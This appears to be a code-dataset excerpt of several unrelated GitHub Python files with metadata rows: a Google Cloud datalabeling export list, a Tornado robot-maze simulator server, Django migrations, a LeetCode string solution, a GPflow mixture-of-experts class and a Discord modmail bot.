from google.cloud.datalabeling_v1beta1.types.evaluation import EvaluationMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import ObjectDetectionMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import PrCurve
from google.cloud.datalabeling_v1beta1.types.evaluation_job import Attempt
from google.cloud.datalabeling_v1beta1.types.evaluation_job import EvaluationJob
from google.cloud.datalabeling_v1beta1.types.evaluation_job import (
EvaluationJobAlertConfig,
)
from google.cloud.datalabeling_v1beta1.types.evaluation_job import EvaluationJobConfig
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
BoundingPolyConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import EventConfig
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
HumanAnnotationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ImageClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ObjectDetectionConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
ObjectTrackingConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
PolylineConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
SegmentationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
SentimentConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
TextClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
TextEntityExtractionConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
VideoClassificationConfig,
)
from google.cloud.datalabeling_v1beta1.types.human_annotation_config import (
StringAggregationType,
)
from google.cloud.datalabeling_v1beta1.types.instruction import CsvInstruction
from google.cloud.datalabeling_v1beta1.types.instruction import Instruction
from google.cloud.datalabeling_v1beta1.types.instruction import PdfInstruction
from google.cloud.datalabeling_v1beta1.types.operations import CreateInstructionMetadata
from google.cloud.datalabeling_v1beta1.types.operations import (
ExportDataOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ExportDataOperationResponse,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ImportDataOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
ImportDataOperationResponse,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageBoundingBoxOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageBoundingPolyOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageOrientedBoundingBoxOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImagePolylineOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelImageSegmentationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import LabelOperationMetadata
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelTextClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelTextEntityExtractionOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoClassificationOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoEventOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoObjectDetectionOperationMetadata,
)
from google.cloud.datalabeling_v1beta1.types.operations import (
LabelVideoObjectTrackingOperationMetadata,
)
__all__ = (
"DataLabelingServiceClient",
"DataLabelingServiceAsyncClient",
"Annotation",
"AnnotationMetadata",
"AnnotationValue",
"BoundingPoly",
"ImageBoundingPolyAnnotation",
"ImageClassificationAnnotation",
"ImagePolylineAnnotation",
"ImageSegmentationAnnotation",
"NormalizedBoundingPoly",
"NormalizedPolyline",
"NormalizedVertex",
"ObjectTrackingFrame",
"OperatorMetadata",
"Polyline",
"SequentialSegment",
"TextClassificationAnnotation",
"TextEntityExtractionAnnotation",
"TimeSegment",
"Vertex",
"VideoClassificationAnnotation",
"VideoEventAnnotation",
"VideoObjectTrackingAnnotation",
"AnnotationSentiment",
"AnnotationSource",
"AnnotationType",
"AnnotationSpec",
"AnnotationSpecSet",
"CreateAnnotationSpecSetRequest",
"CreateDatasetRequest",
"CreateEvaluationJobRequest",
"CreateInstructionRequest",
"DeleteAnnotatedDatasetRequest",
"DeleteAnnotationSpecSetRequest",
"DeleteDatasetRequest",
"DeleteEvaluationJobRequest",
"DeleteInstructionRequest",
"ExportDataRequest",
"GetAnnotatedDatasetRequest",
"GetAnnotationSpecSetRequest",
"GetDataItemRequest",
"GetDatasetRequest",
"GetEvaluationJobRequest",
"GetEvaluationRequest",
"GetExampleRequest",
"GetInstructionRequest",
"ImportDataRequest",
"LabelImageRequest",
"LabelTextRequest",
"LabelVideoRequest",
"ListAnnotatedDatasetsRequest",
"ListAnnotatedDatasetsResponse",
"ListAnnotationSpecSetsRequest",
"ListAnnotationSpecSetsResponse",
"ListDataItemsRequest",
"ListDataItemsResponse",
"ListDatasetsRequest",
"ListDatasetsResponse",
"ListEvaluationJobsRequest",
"ListEvaluationJobsResponse",
"ListExamplesRequest",
"ListExamplesResponse",
"ListInstructionsRequest",
"ListInstructionsResponse",
"PauseEvaluationJobRequest",
"ResumeEvaluationJobRequest",
"SearchEvaluationsRequest",
"SearchEvaluationsResponse",
"SearchExampleComparisonsRequest",
"SearchExampleComparisonsResponse",
"UpdateEvaluationJobRequest",
"ImagePayload",
"TextPayload",
"VideoPayload",
"VideoThumbnail",
"AnnotatedDataset",
"AnnotatedDatasetMetadata",
"BigQuerySource",
"ClassificationMetadata",
"DataItem",
"Dataset",
"Example",
"GcsDestination",
"GcsFolderDestination",
"GcsSource",
"InputConfig",
"LabelStats",
"OutputConfig",
"TextMetadata",
"DataType",
"BoundingBoxEvaluationOptions",
"ClassificationMetrics",
"ConfusionMatrix",
"Evaluation",
"EvaluationConfig",
"EvaluationMetrics",
"ObjectDetectionMetrics",
"PrCurve",
"Attempt",
"EvaluationJob",
"EvaluationJobAlertConfig",
"EvaluationJobConfig",
"BoundingPolyConfig",
"EventConfig",
"HumanAnnotationConfig",
"ImageClassificationConfig",
"ObjectDetectionConfig",
"ObjectTrackingConfig",
"PolylineConfig",
"SegmentationConfig",
"SentimentConfig",
"TextClassificationConfig",
"TextEntityExtractionConfig",
"VideoClassificationConfig",
"StringAggregationType",
"CsvInstruction",
"Instruction",
"PdfInstruction",
"CreateInstructionMetadata",
"ExportDataOperationMetadata",
"ExportDataOperationResponse",
"ImportDataOperationMetadata",
"ImportDataOperationResponse",
"LabelImageBoundingBoxOperationMetadata",
"LabelImageBoundingPolyOperationMetadata",
"LabelImageClassificationOperationMetadata",
"LabelImageOrientedBoundingBoxOperationMetadata",
"LabelImagePolylineOperationMetadata",
"LabelImageSegmentationOperationMetadata",
"LabelOperationMetadata",
"LabelTextClassificationOperationMetadata",
"LabelTextEntityExtractionOperationMetadata",
"LabelVideoClassificationOperationMetadata",
"LabelVideoEventOperationMetadata",
"LabelVideoObjectDetectionOperationMetadata",
"LabelVideoObjectTrackingOperationMetadata",
)
| [
"noreply@github.com"
] | noreply@github.com |
ed55f6dab42ca051e34f6202d470ba130d589aa2 | b0295c52e9b088e24c35b7d1866c31364e32ad6e | /server_sim.py | 48da7397af9c526d59b7016c008eb085576cb813 | [] | no_license | Jeremy-CH-cmyk/CZ3004 | ec1851bbb75fff1f8fb2a8227cde11bc7abd0976 | d7018f4ef22987c25d8a0dbfb34655134860e438 | refs/heads/master | 2023-06-19T11:01:58.925619 | 2021-07-04T10:58:06 | 2021-07-04T10:58:06 | 382,631,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,954 | py | #!/usr/bin/env python
"""Tornado server to run the simulation experiments
Attributes:
app (tornado.web.Application): Address mappings
clients (dict): Dictionary of active clients
settings (dict): Settings for the web-server
"""
import json
import numpy as np
import os
import time
import tornado.web as web
import tornado.websocket as websocket
import tornado.ioloop as ioloop
import threading
from tornado.options import define, options
from Algo.Exploration import Exploration
from Algo.FastestPath import FastestPath
from Algo.Constants import START, GOAL, NORTH
define("port", default=8888, help="run on the given port", type=int)
clients = dict()
currentMap = np.zeros([20, 15])
map_name = 'map.txt'
area = 0
step = 0.1
class FuncThread(threading.Thread):
"""Class to create and run functions on different threads
"""
def __init__(self, target, *args):
"""Construction to initialize the thread
Args:
target (function): Function to be run on new threads
*args: arguments to be passed to the function
"""
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
"""Overrides run function to run the function with given arguments
"""
self._target(*self._args)
class IndexHandler(web.RequestHandler):
"""To display the front-end interface
"""
@web.asynchronous
def get(self):
self.render("index.html")
class WebSocketHandler(websocket.WebSocketHandler):
"""Handles web-socket requests from the front-end to receive/send messages
Attributes:
id (string): id string from GET request
"""
def open(self):
"""Open a web socket for communication
"""
self.id = self.get_argument("Id")
self.stream.set_nodelay(True)
clients[self.id] = {"id": self.id, "object": self}
print("WebSocket opened")
def on_message(self, message):
"""Displays any message received
Args:
message (string): Message received from front-end
"""
print("Client " + str(self.id) + " received a message : " + str(message))
def on_close(self):
"""Run when the web socket is closed
"""
print("WebSocket closed")
if self.id in clients:
del clients[self.id]
class StartHandler(web.RequestHandler):
"""Handles the start of exploration for the maze
"""
@web.asynchronous
def get(self):
self.write("Starting...")
self.step = self.get_argument("step")
self.limit = self.get_argument("limit")
self.coverage = self.get_argument("coverage")
global step
step = float(self.step)
startExploration(self.limit, self.coverage)
self.flush()
class ResetHandler(web.RequestHandler):
"""Handles the reset of the current map
"""
@web.asynchronous
def get(self):
self.write("Reset...")
global exp
exp = Exploration(map_name, 5)
print exp.currentMap
update(np.zeros([20, 15]), exp.exploredArea, exp.robot.center, exp.robot.head,
START, GOAL, 0)
class FSPHandler(web.RequestHandler):
"""Handles the start of fastest path for the maze
"""
@web.asynchronous
def get(self):
self.x = self.get_argument("x")
self.y = self.get_argument("y")
self.write("Starting...")
startFastestPath([self.x, self.y])
self.flush()
class LoadMapHandler(web.RequestHandler):
"""Handles the start of fastest path for the maze
"""
@web.asynchronous
def get(self):
global map_name
self.name = self.get_argument("name")
map_name = self.name
def startExploration(limit, coverage):
"""To start the exploration of the maze
"""
global exp, t_s
exp = Exploration(map_name, 5)
t_s = time.time()
t2 = FuncThread(exploration, exp, limit, coverage)
t2.start()
# t2.join()
def exploration(exp, limit, coverage):
"""To explore the map and update the front-end after each move
Args:
exp (Exploration): New instance of the exploration class
"""
global currentMap, area
limit = map(int, str(limit).strip().split(':'))
time_limit = limit[0]*60*60 + limit[1]*60 + limit[2]
elapsedTime = 0
update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL, 0)
logger('Exploration Started !')
current = exp.moveStep()
currentMap = exp.currentMap
area = exp.exploredArea
visited = dict()
steps = 0
numCycle = 1
while (not current[1] and elapsedTime <= time_limit and exp.exploredArea < int(coverage)):
elapsedTime = round(time.time()-t_s, 2)
update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL,
elapsedTime)
current = exp.moveStep()
currentMap = exp.currentMap
area = exp.exploredArea
steps += 1
currentPos = tuple(exp.robot.center)
if (currentPos in visited):
visited[currentPos] += 1
if (visited[currentPos] > 3):
neighbour = exp.getExploredNeighbour()
if (neighbour):
neighbour = np.asarray(neighbour)
fsp = FastestPath(currentMap, exp.robot.center, neighbour,
exp.robot.direction, None)
fastestPath(fsp, neighbour, exp.exploredArea, None)
exp.robot.center = neighbour
exp.robot.head = fsp.robot.head
exp.robot.direction = fsp.robot.direction
else:
break
else:
visited[currentPos] = 1
if (np.array_equal(exp.robot.center, START)):
numCycle += 1
if (numCycle > 1 and steps > 4 and exp.exploredArea < 100):
neighbour = exp.getExploredNeighbour()
if (neighbour):
neighbour = np.asarray(neighbour)
fsp = FastestPath(currentMap, exp.robot.center, neighbour,
exp.robot.direction, None)
fastestPath(fsp, neighbour, exp.exploredArea, None)
exp.robot.center = neighbour
exp.robot.head = fsp.robot.head
exp.robot.direction = fsp.robot.direction
exp.robot.getSensors()
else:
break
time.sleep(float(step))
update(exp.currentMap, exp.exploredArea, exp.robot.center, exp.robot.head, START, GOAL,
elapsedTime)
logger('Exploration Done !')
logger("Map Descriptor 1 --> "+str(exp.robot.descriptor_1()))
logger("Map Descriptor 2 --> "+str(exp.robot.descriptor_2()))
fsp = FastestPath(currentMap, exp.robot.center, START, exp.robot.direction, None)
logger('Fastest Path Started !')
fastestPath(fsp, START, exp.exploredArea, None)
def startFastestPath(waypoint):
"""To start the fastest path of the maze
"""
global fsp
global t_s
waypoint = map(int, waypoint)
fsp = FastestPath(currentMap, START, GOAL, NORTH, waypoint)
t_s = time.time()
logger('Fastest Path Started !')
t3 = FuncThread(fastestPath, fsp, GOAL, area, waypoint)
t3.start()
# t3.join() this causes the thread to close after exploration and websocket closes
def markMap(curMap, waypoint):
if waypoint:
curMap[tuple(waypoint)] = 7
return curMap
def fastestPath(fsp, goal, area, waypoint):
fsp.getFastestPath()
logger(json.dumps(fsp.path))
while (fsp.robot.center.tolist() != goal.tolist()):
fsp.moveStep()
elapsedTime = round(time.time()-t_s, 2)
update(markMap(np.copy(fsp.exploredMap), waypoint), area, fsp.robot.center, fsp.robot.head,
START, GOAL, elapsedTime)
time.sleep(step)
logger('Fastest Path Done !')
def update(current_map, exploredArea, center, head, start, goal, elapsedTime):
"""To send messages to update the front-end
Args:
current_map (Numpy array): Current state of the exploration map
exploredArea (int): Number of cells that have been explored
center (list): Location of center of the robot
head (list): Location of head of the robot
start (list): Location of the starting point for the robot
goal (list): Location of the finishing point for the robot
elapsedTime (float): The time that has elapsed since exploration started
"""
for key in clients:
message = dict()
message['area'] = '%.2f' % (exploredArea)
tempMap = current_map.copy()
tempMap[start[0]-1: start[0]+2, start[1]-1: start[1]+2] = 3
tempMap[goal[0]-1: goal[0]+2, goal[1]-1: goal[1]+2] = 4
message['map'] = json.dumps(tempMap.astype(int).tolist())
message['center'] = json.dumps(center.astype(int).tolist())
message['head'] = json.dumps(head.astype(int).tolist())
message['time'] = '%.2f' % (elapsedTime)
clients[key]['object'].write_message(json.dumps(message))
def logger(message):
for key in clients:
log = {'log': message}
clients[key]['object'].write_message(json.dumps(log))
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "GUI", "templates"),
debug=True
)
app = web.Application([
(r'/', IndexHandler),
(r'/websocket', WebSocketHandler),
(r'/start', StartHandler),
(r'/reset', ResetHandler),
(r'/fsp', FSPHandler),
(r'/lm', LoadMapHandler),
(r'/(.*)', web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "GUI")})
], **settings)
if __name__ == '__main__':
app.listen(options.port)
t1 = FuncThread(ioloop.IOLoop.instance().start)
t1.start()
t1.join()
| [
"zyj82073693@gmail.com"
] | zyj82073693@gmail.com |
e1b6cbccee50c959c6cedbd313d04a47b3d26b07 | 4fcc1a1261f585f955337da5f1ccd00568735093 | /8variableassignments2Assignandprint.py | 45422c40f839dfff2cfb80e4ec2c8d6856c5d1dd | [] | no_license | akilakilakil/pythonprograms | cd8b2859d7a170263befe89875d3aad2a1675d73 | 23167f5d6c63a6e4cd9d06e156a9202bfb5a9623 | refs/heads/master | 2021-05-05T21:20:24.125374 | 2017-12-27T18:34:24 | 2017-12-27T18:34:24 | 115,519,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | greeting="hello world"
first="narendra"
last="modi"
print(greeting)
print()
print(first+" "+last+" "+"won!") | [
"noreply@github.com"
] | noreply@github.com |
2abcd63ea8fc6f13067f74ec6bed69e75c9af4f6 | de5a90737ce5a515b220e95b1b992e29ecb9c481 | /main/migrations/0004_auto_20210513_1155.py | 1a4ed658644ffc2c3e43a9497ff39f5aa5cb8253 | [] | no_license | web-prof/mcc | 39d8dc2101e070b7cff871b349ee07761fc96ab1 | b48342dfeccbf88245d47f1b098b30a4dd1f4e84 | refs/heads/main | 2023-06-14T07:18:03.016423 | 2021-07-10T05:59:51 | 2021-07-10T05:59:51 | 383,214,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | # Generated by Django 3.2 on 2021-05-13 09:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20210506_2251'),
]
operations = [
migrations.AddField(
model_name='profile',
name='created',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='profile',
name='updated',
field=models.DateTimeField(auto_now=True, null=True),
),
]
| [
"ishakg29@gmail.com"
] | ishakg29@gmail.com |
876fc1a78537224343052e98af0c117e88b960b7 | 5fd6c20e54ad4bb804dda3925b5dbd22e1b78cfd | /excersise/leetcode/459_重复的子字符串.py | 6d5521e6fc009c12a2297e88af8b8300210eda46 | [] | no_license | alanlyang/learning | 6d748134bbc8786018e0d75a499aed44cec1d9c7 | dfacd79e4d5bf74db08cb95e4dd5f19df1e32393 | refs/heads/master | 2023-01-06T05:29:22.134224 | 2020-11-03T09:54:23 | 2020-11-03T09:54:23 | 287,918,906 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,394 | py | ######################
# 给定一个非空滋肤疮,判断是否可以由它的一个子串重复多次构成
# 字符串只含有小写英文字母,且长度不超过10000
# 2020-08-24
########################
class Solution:
def repeatedSubStringPattern1(self, s: str) -> bool:
"""
设字符串长度为n , 子串长度为t,则有
1、n为t的整数倍
2、子串为原串的前缀
3、原串某个位置的字符满足 s[i] = s[i - t]
复杂度分析:
时间 O(n*n): 枚举i 为 O(n), 遍历s为O(n)
空间复杂度O(1): 仅使用了s i j 三个变量
"""
n = len(s)
for i in range(1, n//2 + 1):
# 满足第二个条件
if n % i == 0:
if all(s[j] == s[j-i] for j in range(i, n)):
return True
return False
def answer2(self, s):
"""
字符串匹配:
利用s+s 去除头部和尾部字符后,s 必定为s+s的一个字串
"""
return (s+s).find(s, 1) != len(s)
def answer3(self, s):
"""
kmp算法实现
"""
def kmp(query, pattern):
n ,m = len(query), len(pattern)
# 初始化pmt数组
fail = [-1] * m
# 计算pmt数组
for i in range(1, m):
j = fail[i-1]
while j != -1 and pattern[j+1] != pattern[i]:
j = fail[j]
if pattern[j+1] == pattern[i]:
fail[i] = j+1
print("fail: {}".format(fail))
match = -1
for i in range(1, n-1):
while match != -1 and pattern[match+1] != query[i]:
match = fail[match]
if pattern[match+1] == query[i]:
match += 1
if match == m-1:
return True
return False
return kmp(s+s, s)
pass
if __name__ == "__main__":
soul = Solution()
print(soul.answer3("abab"))
"""
kmp算法:(一种用于字符串查找的算法)
kmp算法核心:部分匹配表(Partial Match Table)
PMT中的value是字符串前缀集合与后缀集合的交集中最长元素的长度
next数组为模式串自匹配上的长度
""" | [
"alanyang414@gmail.com"
] | alanyang414@gmail.com |
4acc7b718d2d2caf62de1f3026264d39249cbaf5 | fdeb384c89ed7bab969dbddf409005b1a50fc577 | /mogpe/mixture_of_experts/base.py | 902f32f459b88787362ff04fa95c5bc84337bd35 | [
"Apache-2.0"
] | permissive | Mr-G1998/mogpe | 6e2df773b64c57f3336d949361663e51078734a6 | 220d708899dd5db3d5860228cc7f68c4009e82eb | refs/heads/master | 2023-03-10T17:15:11.351225 | 2021-01-21T14:36:30 | 2021-01-21T14:36:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,730 | py | #!/usr/bin/env python3
from abc import ABC, abstractmethod
from typing import Optional, Tuple
import gpflow as gpf
import tensorflow as tf
import tensorflow_probability as tfp
from gpflow import default_float
from gpflow.models import BayesianModel, ExternalDataTrainingLossMixin
from gpflow.models.training_mixins import InputData, RegressionData
from mogpe.experts import ExpertsBase
from mogpe.gating_networks import GatingNetworkBase
tfd = tfp.distributions
class MixtureOfExperts(BayesianModel, ABC):
"""Abstract base class for mixture of experts models.
Given an input :math:`x` and an output :math:`y` the mixture of experts
marginal likelihood is given by,
.. math::
p(y|x) = \sum_{k=1}^K \Pr(\\alpha=k | x) p(y | \\alpha=k, x)
Assuming the expert indicator variable :math:`\\alpha \in \{1, ...,K\}`
the mixing probabilities are given by :math:`\Pr(\\alpha=k | x)` and are
collectively referred to as the gating network.
The experts are given by :math:`p(y | \\alpha=k, x)` and are responsible for
predicting in different regions of the input space.
Each subclass that inherits MixtureOfExperts should implement the
maximum_log_likelihood_objective(data) method. It is used as the objective
function to optimise the models trainable parameters.
:param gating_network: an instance of the GatingNetworkBase class with
the predict_mixing_probs(Xnew) method implemented.
:param experts: an instance of the ExpertsBase class with the
predict_dists(Xnew) method implemented.
"""
def __init__(
self, gating_network: GatingNetworkBase, experts: ExpertsBase
):
"""
:param gating_network: an instance of the GatingNetworkBase class with
the predict_mixing_probs(Xnew) method implemented.
:param experts: an instance of the ExpertsBase class with the
predict_dists(Xnew) method implemented.
"""
assert isinstance(gating_network, GatingNetworkBase)
self.gating_network = gating_network
assert isinstance(experts, ExpertsBase)
self.experts = experts
self.num_experts = experts.num_experts
def predict_mixing_probs(self, Xnew: InputData, **kwargs):
"""Calculates the mixing probabilities at Xnew.
:param Xnew: inputs with shape [num_test, input_dim]
:param kwargs: kwargs to be passed to the gating networks
predict_mixing_probs() method.
:returns: a batched Tensor with shape [..., num_test, 1, num_experts]
"""
with tf.name_scope("predict_mixing_probs") as scope:
mixing_probs = self.gating_network.predict_mixing_probs(
Xnew, **kwargs
)
# shape_constraints = [
# (mixing_probs, ["...", "num_data", "1",
# self.num_experts]),
# ]
# tf.debugging.assert_shapes(
# shape_constraints,
# message=
# "Mixing probabilities dimensions (from gating network) should be [..., num_data, 1, num_experts]"
# )
return self.gating_network.predict_mixing_probs(Xnew, **kwargs)
def predict_experts_dists(self, Xnew: InputData, **kwargs) -> tf.Tensor:
"""Calculates each experts predictive distribution at Xnew.
:param Xnew: inputs with shape [num_test, input_dim]
:param kwargs: kwargs to be passed to the experts
predict_dists() method.
:returns: a batched Tensor with shape [..., num_test, output_dim, num_experts]
"""
with tf.name_scope("predict_experts_dists") as scope:
dists = self.experts.predict_dists(Xnew, **kwargs)
return dists
def predict_y(self, Xnew: InputData, **kwargs) -> tfd.Distribution:
# TODO should there be separate kwargs for gating and experts?
"""Predicts the mixture distribution at Xnew.
:param Xnew: inputs with shape [num_test, input_dim]
:param kwargs: kwargs to be passed to predict_mixing_probs and
predict_experts_dists
:returns: The prediction as a TensorFlow MixtureSameFamily distribution
"""
mixing_probs = self.predict_mixing_probs(Xnew, **kwargs)
print("mixing probs shape")
print(mixing_probs.shape)
dists = self.predict_experts_dists(Xnew, **kwargs)
print("experts dists shape")
print(dists.batch_shape)
if dists.batch_shape != tf.shape(mixing_probs):
# mixing_probs = tf.expand_dims(mixing_probs, -2)
mixing_probs = tf.broadcast_to(mixing_probs, dists.batch_shape)
tf.debugging.assert_equal(
dists.batch_shape_tensor(),
tf.shape(mixing_probs),
message="Gating networks predict_mixing_probs(Xnew,...) and experts predict_dists(Xnew,...) dimensions do not match",
)
return tfd.MixtureSameFamily(
mixture_distribution=tfd.Categorical(probs=mixing_probs),
components_distribution=dists,
)
def predict_y_samples(
self, Xnew: InputData, num_samples: int = 1, **kwargs
) -> tf.Tensor:
"""Returns samples from the predictive mixture distribution at Xnew.
:param Xnew: inputs with shape [num_test, input_dim]
:param num_samples: number of samples to draw
:param kwargs: kwargs to be passed to predict_mixing_probs and
predict_experts_dists
:returns: a Tensor with shape [num_samples, num_test, output_dim]
"""
return self.predict_y(Xnew, **kwargs).sample(num_samples)
| [
"scannell.aidan@gmail.com"
] | scannell.aidan@gmail.com |
3a04a77da2ee5df5107a7f1f4186b15aaa3400bd | ca08100b33a78c01bf49f097f4e80ed10e4ee9ad | /intrepidboats/apps/boats/migrations/0025_auto_20170518_1334.py | 4d0337d5918da1292d1f741df70a316bbba6feec | [] | no_license | elite0401/intrepidpowerboats | 347eae14b584d1be9a61ca14c014135ab0d14ad0 | d2a475b60d17aa078bf0feb5e0298c927e7362e7 | refs/heads/master | 2021-09-11T01:51:47.615117 | 2018-04-06T02:20:02 | 2018-04-06T02:20:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 567 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-05-18 17:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boats', '0024_video_video_external_url'),
]
operations = [
migrations.AlterField(
model_name='abouttheboatimage',
name='kind',
field=models.CharField(choices=[('EXTERIOR', 'exterior'), ('INTERIOR', 'interior'), ('CABIN', 'cabin')], max_length=25, verbose_name='kind'),
),
]
| [
"elite.wisdom@gmx.com"
] | elite.wisdom@gmx.com |
9952149d06ddc78f875ccee8e4e44294dddea96a | c3a3c8c242e968f185bc1e858dd3ad05d51f385a | /main.py | bbf618809419834b60c39ff41a20502e3f60fba2 | [] | no_license | oindrieel/Dwayne | cb5ac5a6617a7aff263c04f388cd64733960f661 | b87d7cb8f51f4f71257c9e6d90f72a44894f30fd | refs/heads/main | 2023-03-18T12:45:19.956260 | 2021-02-28T13:47:21 | 2021-02-28T13:47:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,522 | py | import asyncio
import discord
import os
import json
import sys
from discord import channel
from discord.ext import tasks
from discord.ext import commands
from asyncio import sleep
from discord.flags import Intents
from settings import *
from pretty_help import PrettyHelp, Navigation
client = commands.Bot(command_prefix='.', intents=discord.Intents.all())
banner = ""
# nav = Navigation(":mag_right:", ":arrow_left:", ":arrow_right:")
color = discord.Color.purple()
client.help_command = PrettyHelp(color=color, active_time=15)
for filename in os.listdir("./cogs"):
if filename.endswith(".py") and filename != "__init__.py":
client.load_extension(f'cogs.{filename[:-3]}')
print(f'Loaded {filename}')
@client.event
async def on_ready():
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="DM me for Help"))
print('Logged on as {0}!'.format(client.user))
while True:
await asyncio.sleep(10)
with open("spam_detect.txt", "r+") as f:
f.truncate(0)
CONFIG_PATH = "config.json"
default_config = {
"token": "[ add bot token here ]",
"developers": [],
"replacements": {},
"prefix": "^",
"mod_role": 0,
"blacklist": [],
"server": 0,
"mail_channel": 0,
"from_field": 1,
}
class ModmailBot(commands.Cog):
def __init__(self, bot, config):
self.bot = bot
self.config = config
self.last_user = None
@commands.Cog.listener("on_ready")
async def on_ready(self):
print(f"Signed in as {self.bot.user} ({self.bot.user.id})")
@commands.Cog.listener("on_message")
async def on_message(self, message):
if not isinstance(message.channel, discord.DMChannel) or message.author.id == self.bot.user.id:
# not a DM, or it's just the bot itself
return
channel = self.bot.get_channel(self.config["mail_channel"])
if not channel:
print("Mail channel not found! Reconfigure bot!")
main_guild = self.bot.get_guild(self.config["server"])
if not main_guild:
print("Main Server ID is incorrect! Reconfigure bot!")
author = message.author
else:
author = main_guild.get_member(message.author.id)
if not author:
author = message.author
content = message.clean_content
embed = discord.Embed()
embed.set_author(name="{} ({}#{})".format(author.display_name, author.name, author.discriminator),
icon_url=author.avatar_url)
embed.timestamp = message.created_at
embed.set_footer(text='User ID: {}'.format(author.id))
embed.color = author.color
embed.add_field(name="Message", value=content[:1000] or "blank")
if len(content[1000:]) > 0:
embed.add_field(name="(Continued)", value=content[1000:])
await channel.send(content=f"{message.author.id}", embed=embed)
try:
await message.add_reaction('📬')
except discord.ext.commands.errors.CommandInvokeError:
await message.channel.send('📬')
self.last_user = author
async def _shutdown(self):
await self.bot.logout()
await self.bot.close()
self.bot.loop.stop()
@commands.command()
async def dm(self, ctx, user : discord.User, *, msg):
if ctx.channel.id != self.config["mail_channel"]:
return
main_guild = self.bot.get_guild(self.config["server"])
if not main_guild:
print("Main Server ID is incorrect! Reconfigure bot!")
return ctx.send('Main Server Unavailable')
else:
if str(ctx.message.author.id) in config['replacements']:
author = main_guild.get_member(config['replacements'][str(ctx.message.author.id)])
if not author:
author = self.bot.user
try:
await ctx.message.add_reaction('🔄')
except:
await ctx.send('🔄')
else:
author = main_guild.get_member(ctx.message.author.id)
if not author:
author = self.bot.user
embed = discord.Embed()
if self.config["from_field"]:
embed.set_author(name="{} ({}#{})".format(author.display_name, author.name, author.discriminator),
icon_url=author.avatar_url)
else:
embed.set_author(name="Moderator Response", icon_url=ctx.channel.guild.icon)
embed.timestamp = ctx.message.created_at
embed.color = author.color
embed.add_field(name="Message", value=msg[:1000] or "blank", inline=False)
if len(msg) > 1000:
embed.add_field(name="(Continued)", value=msg[1000:], inline=False)
if ctx.message.attachments:
embed.add_field(name="Attachments", value=", ".join([i.url for i in ctx.message.attachments]))
await user.send(embed=embed)
try:
await ctx.message.add_reaction('📬')
except:
await ctx.send('📬')
self.last_user = user
@commands.command(aliases=['r'])
async def reply(self, ctx, *, msg):
if self.last_user is None:
await ctx.send("No user to reply to!")
return
await self.dm.callback(self, ctx, user=self.last_user, msg=msg)
@commands.command()
async def reee(self, ctx, user : discord.User, times : int, *, msg):
if ctx.author.id not in config["developers"]:
return
with ctx.typing():
for i in range(times):
if self.config["from_field"]:
await user.send(f"From {ctx.author.display_name}: {msg}")
else:
await user.send(msg)
await sleep(1.25)
await ctx.message.add_reaction('📬')
@commands.command()
async def shutdown(self, ctx):
if ctx.author.id not in config["developers"]:
return
await ctx.send('Shutting down...')
await self._shutdown()
@commands.command ()
async def restart(self, ctx):
if ctx.author.id not in config["developers"]:
return
await ctx.send('Restarting...')
await self._shutdown()
script = sys.argv[0]
if script.startswith(os.getcwd()):
script = script[len(os.getcwd()):].lstrip(os.sep)
if script.endswith('__main__.py'):
args = [sys.executable, '-m', script[:-len('__main__.py')].rstrip(os.sep).replace(os.sep, '.')]
else:
args = [sys.executable, script]
os.execv(sys.executable, args + sys.argv[1:])
def write_config(config: dict):
with open(CONFIG_PATH, "w") as f:
json.dump(config, f, indent="\t")
def read_config():
